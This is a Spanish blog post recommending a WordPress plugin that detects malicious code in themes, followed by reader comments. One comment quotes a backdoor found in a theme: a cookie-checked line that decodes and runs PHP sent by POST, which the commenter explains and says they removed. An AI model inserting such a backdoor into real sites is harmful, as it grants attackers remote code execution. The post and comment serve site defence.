28sep
8

¿Han hackeado tu Theme?

Hoy en día no es imposible hackear un theme WordPress, si no cumples unas mínimas reglas de seguridad alguien podría insertar código en tu theme, pero no solo así, es mucho mas fácil. Porque llevado por las búsquedas puedes llegar a descargar un theme de un sitio dudoso, en vez del sitio oficial, y activarlo en tu blog sin saber que lleva incluido código malicioso.

Si tienes dudas, o quieres asegurarte, puedes comprobarlo con el plugin Theme Authenticity Checker (o TAC). Lo que hace es buscar en los archivos de tu theme instalado y tratar de detectar código malicioso. Si encuentra código de este tipo muestra la ruta al fichero del theme, el número de línea donde está y una pequeña muestra del código sospechoso.

Ahora bien ¿es seguro que ese código sea código malicioso?. Hay posibilidades de que no sea así. No es que sean muchos pero si hay algunos creadores de themes que incluyen códigos ocultos en Base64 o similares para, por ejemplo, impedir que retires los créditos al autor o sus patricinadores.

Entonces ¿como sé si el código es malware o no?. Lo mas fácil es contactar con el autor para comprobarlo, o si quieres descargar la versión “oficial” y comparar las posibles diferencias.

En cualquier caso, Theme Authenticity Checker te da pistas acerca de códigos que no deberían estar ahí, que no son normales en un theme para WordPress.

Para saber más:

por en Plugins, Seguridad, Themes, Wordpress.org código, Experto, hacking, malware, Seguridad

  • Pingback: Bitacoras.com

  • http://blooging.co.cc JuanK

    Exelente Fernando, así nos podemos asegurar de que estamos usando un theme bueno, por así decirlo, sin ningún tipo de modificaciones raras.
    Muchas gracias por el plugin.

    Nos vemos

  • http://www.tgn-colombia.com TGNcolombia

    Me fascino esta herramienta… Por que desde ella tambien modifico los creditos y unos cuantos enlaces publicitarios… Gracias por haber posteado este plugin tan excelente…. Chao Ayudawordpress.com

  • http://blog.chefuri.com Chefwww

    Pues en mi teme había un código muy sospechoso:

    if($_COOKIE['daccaf48560b651c']==”931f9058bd933379″){ eval(base64_decode($_POST['file'])); exit; }

    Que sería algo como si la cookie es igual 931f9058bd933379 puedes recibir por post la variable file, lo descodificas de la base 64 y lo ejecutas.

    Ya lo he borrado porque creo que con esto puedes enviar un fichero y ejecutar las ordenes en php….

    Ya investigaré si ese código estaba ahí desde un principio.

  • http://mundologia.net/ Nachitox

    Excelente plugin!.

    Siempre que veo que algún theme contiene código ofuscado en el footer.php, lo que siempre hago es cambiar de theme o pedir ayuda para que me lo ofusquen.

    Saludos!

  • http://granimpetu.com Horacio Bella

    Excelente recomendación. Hace algunos días tuve un problema de estos (por estar usando una versión vieja de WordPress) y realmente fue un problema ya que Google consideró mi sitio como presunto de ataques.

  • Pingback: TAC: Plugin para WordPress que detecta códigos maliciosos en tu Theme | Blogs Bazaar

  • Pingback: Volviendo a las pistas…(seguridad en wordpress) | TUXTON